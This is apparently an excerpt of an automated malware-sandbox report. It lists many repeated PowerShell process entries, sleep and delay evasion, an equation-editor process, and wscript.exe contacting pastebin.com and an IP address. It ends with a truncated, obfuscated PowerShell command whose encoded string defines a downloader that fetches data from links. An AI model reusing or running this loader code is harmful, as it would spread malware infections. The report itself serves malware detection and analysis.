Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 512 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2106 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2188 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7604 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 784 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3002 Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1696 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3120 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3284 Thread sleep count: 2188 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292 Thread sleep count: 7604 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -11068046444225724s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 Thread sleep time: -1800000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524 Thread sleep count: 784 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524 Thread sleep count: 3002 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035604BC mov edx, dword ptr fs:[00000030h] 2_2_035604BC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exe Domain query: pastebin.com
Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 172.67.19.24 443 Jump to behavior
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3160, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDg